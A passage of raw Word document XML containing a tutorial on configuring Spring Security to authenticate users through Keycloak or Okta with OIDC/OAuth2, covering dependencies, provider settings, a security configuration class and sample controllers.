        <w:t xml:space="preserve">, you need to configure Spring Security to delegate authentication and authorization to the identity provider. This can be achieved by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security OAuth2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> support for authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA1536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Here’s a step-by-step guide for both Keycloak and Okta integration using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OIDC</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OAuth2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A5372"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C18A67">
          <v:rect id="_x0000_i2847" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2FDD9C"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1. Dependency Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16556F0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Maven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66924D9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dd the necessary dependencies for Spring Security and OAuth2 client support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B6999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t;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192E9DC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2C68B5E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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48178F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artifactId&gt;spring-boot-starter-oauth2-client&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF565D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4351FC2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3B42F30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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127145D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artifactId&gt;spring-boot-starter-security&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E91A9E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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552F66A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t;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16829BF8"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Gradle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA6378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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AC5BD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implementation 'org.springframework.boot:spring-boot-starter-oauth2-client'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494BB98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implementation 'org.springframework.boot:spring-boot-starter-security'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7919E80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71E843C4"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E7402D">
          <v:rect id="_x0000_i2848" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="767C9895"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2. Keycloak or Okta Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F67900"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Keycloak Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8CCBF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reate a Client in Keycloak</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7AA4B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og in to Keycloak admin console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CF6D6"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Create a new </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OAuth2 Client) under the appropriate realm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266561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Redirect URI</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the Spring Boot application's URL (e.g., http://localhost:8080/login/oauth2/code/keycloak).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B01B55B"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Client ID</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Client Secret</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B97275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onfigure OpenID Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD5027"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Make sure Keycloak is configured to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OpenID Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F88EBAC"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You can find the OIDC </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Discovery URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., http://&lt;keycloak-server&gt;/realms/&lt;realm-name&gt;/.well-known/openid-configuration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C5D09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Okta Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF358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reate an Application in Okta</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13153045"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Log in to Okta Developer Console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE991B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Create a new </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Web Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> under the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51873035"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Set the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Redirect URI</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., http://localhost:8080/login/oauth2/code/okta).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A51333A"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Retrieve the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Client ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Client Secret</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282706F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Enable OpenID Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C433C32"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Okta supports OIDC out of the box, and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Discovery URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically: https://&lt;your-okta-domain&gt;/oauth2/default/.well-known/openid-configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A693DC7"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5BF02">
          <v:rect id="_x0000_i2849" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7273DF9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3. Spring Security Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6256B8EB"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a. Configure Application Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400E76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dd the OIDC configuration to your application.yml or application.properties file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BA9165"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For Keycloak:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6898E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE74C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ecurity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25933CE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C953E3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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2481B65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gistration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3BFED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keycloak:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BABF27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id: &lt;keycloak-client-id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E812FC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secret: &lt;keycloak-client-secret&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D11FEF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 keycloak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666E38E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cope: openid, profile, email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D897ED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grant-type: authorization_code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3A2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direct-uri: "{baseUrl}/login/oauth2/code/keycloak"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681A2C4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F217F6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keycloak:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321639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uri: http://&lt;keycloak-server&gt;/realms/&lt;realm-name&gt;/protocol/openid-connect/auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F580A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token-uri: http://&lt;keycloak-server&gt;/realms/&lt;realm-name&gt;/protocol/openid-connect/token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F554B6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user-info-uri: http://&lt;keycloak-server&gt;/realms/&lt;realm-name&gt;/protocol/openid-connect/userinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639915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jwk-set-uri: http://&lt;keycloak-server&gt;/realms/&lt;realm-name&gt;/protocol/openid-connect/certs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498AA7C7"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For Okta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675354F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EF28C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ecurity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFC11B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0041696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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6874D0C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gistration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64797B7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kta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238370E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id: &lt;okta-client-id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048F4FD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client-secret: &lt;okta-client-secret&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F6E9F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 okta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A49B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cope: openid, profile, email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056A2EE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grant-type: authorization_code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5594E87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direct-uri: "{baseUrl}/login/oauth2/code/okta"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA80E8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vider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66431CD3"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kta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B5B02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ation-uri: https://&lt;your-okta-domain&gt;/oauth2/default/v1/authorize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5034B34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token-uri: https://&lt;your-okta-domain&gt;/oauth2/default/v1/token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CE40C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user-info-uri: https://&lt;your-okta-domain&gt;/oauth2/default/v1/userinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5396C1B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jwk-set-uri: https://&lt;your-okta-domain&gt;/oauth2/default/v1/keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59918921"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CDA690">
          <v:rect id="_x0000_i2850" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F468B0F"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b. Spring Security Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105190A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You do not need a custom security configuration for the basic integration. Spring Security with the OAuth2 client will automatically configure authentication for you. However, you can customize your security setup if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2426EDB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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047B902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EnableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355105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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41619979" w14:textId="77777777" w:rsidR="00FF0B50" w:rsidRPr="00FF0B50" w:rsidRDefault="00FF0B50" w:rsidP="00FF0B50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5849A10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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB477B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rotected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75619B5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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C906B9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uthorizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7C286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tMatchers("/", "/home", "/login**", "/error").permitAll()  // Public endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3526686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yRequest().authenticated()   // All other requests need authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D81379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and()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013DE6A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oauth2Login()    // Enable OAuth2 login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC6963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defaultSuccessUrl("/welcome", true);  // Redirect to /welcome after successful login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637DBE5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69FC907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193ECBD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c. Accessing User Info (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191DFFA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Once authenticated via the external identity provider, you can access user details (like email, name, etc.) using Spring Security's OAuth2User:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE62EC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lastRenderedPageBreak/>
        <w:t>@Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9DFC4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HomeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE359FF" w14:textId="77777777" w:rsidR="00FF0B50" w:rsidRPr="00FF0B50" w:rsidRDefault="00FF0B50" w:rsidP="00FF0B50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F008CA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GetMapping("/welcome")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321278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ublic String welcomePage(Model model, @AuthenticationPrincipal OAuth2User principal) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F5604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model.addAttribute("name", principal.getAttribute("name"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157C14A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model.addAttribute("email", principal.getAttribute("email"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54324594"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turn "welcome";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A42DF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6083FF1F"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42DF306A"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is method gives you access to the user's data from the identity provider, such as their name or email address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751186B"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BBF72">
          <v:rect id="_x0000_i2851" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D228667"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4. Run the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408B0CD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Once the integration is set up, running the application will allow users to log in via the identity provider (Keycloak or Okta).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31784B67"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Login Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF18A34"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e user accesses a protected endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434FDA4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 Security redirects the user to the identity provider’s login page (e.g., Keycloak or Okta).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697603D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After authentication, the identity provider redirects the user back to your application with an authorization code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7E9A29"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Spring Security exchanges the authorization code for an access token and ID token (OAuth2 flow).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ECFA2C" w14:textId="77777777" w:rsidR="00FF0B50" w:rsidRPr="00FF0B50" w:rsidRDefault="00FF0B50" w:rsidP="00FF0B50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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e user is authenticated and granted access to the requested resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C465DC0"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C7026">
          <v:rect id="_x0000_i2852" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22875A94"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5. (Optional) Use JWT Tokens for API Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAAB2B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To handle API calls that require authentication after login, use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OAuth2 access token</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each request. The token can be added to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Authorization header</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5896CCE1"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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3EA8A2"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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD820F8"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RequestMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5075CD4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public class ApiController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5251922F" w14:textId="77777777" w:rsidR="00FF0B50" w:rsidRPr="00FF0B50" w:rsidRDefault="00FF0B50" w:rsidP="00FF0B50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E61EA0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GetMapping("/profile")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C811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public ResponseEntity&lt;String&gt; getProfile(@RequestHeader("Authorization") String authHeader) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D101B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String token = authHeader.replace("Bearer ", "");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3B58F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 Use token for API calls or pass to another service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D1D2C0"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return ResponseEntity.ok("Authenticated User Profile");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548EFEDE"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD472CD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44E861" w14:textId="77777777" w:rsidR="00FF0B50" w:rsidRPr="00FF0B50" w:rsidRDefault="00000000" w:rsidP="00FF0B5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1745D6">
          <v:rect id="_x0000_i2853" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6793BD22" w14:textId="77777777" w:rsidR="00FF0B50" w:rsidRPr="00FF0B50" w:rsidRDefault="00FF0B50" w:rsidP="00FF0B50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Summary</w:t>
